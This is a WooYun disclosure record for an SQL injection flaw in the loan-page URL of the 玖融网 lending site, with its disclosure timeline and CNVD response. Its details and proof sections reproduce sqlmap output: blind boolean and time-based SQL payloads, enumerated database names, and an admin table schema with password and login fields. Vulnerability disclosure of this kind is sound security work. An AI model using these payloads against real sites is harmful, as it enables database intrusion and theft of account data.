
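Vulnerability Summary

Bug ID: wooyun-2015-0132486

Title: SQL injection vulnerability on the 玖融网 main site

Vendor: 玖融网

Author: 李叫兽就四李叫兽

Submitted: 2015-08-13 09:49

Fixed: 2015-09-28 17:28

Published: 2015-09-28 17:28

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org. For questions or help, contact [email protected]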


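Vulnerability Details

Disclosure status:

2015-08-13: Details sent to the vendor; awaiting vendor handling
2015-08-14: CNCERT (National Internet Emergency Center) has not yet been able to reach the organization concerned; details disclosed only to the notifying agencies
2015-08-24: Details disclosed to core white hats and experts in related fields
2015-09-03: Details disclosed to regular white hats
2015-09-13: Details disclosed to intern white hats
2015-09-28: Details disclosed to the public

Brief description:

Forgot to bring security!!!

Detailed description: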

https://**.**.**.**/loan/loanInfo/id/11449* (GET)


Pseudo-static URL
sqlmap identified the following injection point(s) with a total of 59 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
available databases [7]:
[*] information_schema
[*] j_bbs
[*] j_oa
[*] j_session
[*] j_site
[*] j_uc
[*] mysql
Database: j_site
Table: d_admin
[9 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| groupid | smallint(3) |
| id | int(11) |
| loginip | varchar(100) |
| logintime | int(11) |
| mobile | varchar(11) |
| password | varchar(100) |
| status | tinyint(2) |
| tname | varchar(100) |
| uname | varchar(100) |
+-----------+--------------+
Database: j_site
Table: d_admin
[9 entries]
current user: 'jiurong@192.168.0.%'
current user is DBA: False
database management system users password hashes:

Proof of vulnerability:

https://**.**.**.**/loan/loanInfo/id/11449* (GET)


Pseudo-static URL
sqlmap identified the following injection point(s) with a total of 59 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12

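Fix:

Copyright notice: when reposting, please credit the source 李叫兽就四李叫兽@乌云 (WooYun)


Vulnerability Response

Vendor response:

Severity: Medium

Vulnerability Rank: 8

Confirmed: 2015-08-14 17:27

Vendor reply:

CNVD confirms the situation described. CNVD has notified the site operator by email through its publicly listed contact channel; the operator is to provide a fix and coordinate handling with the affected user organizations.

Latest status:

None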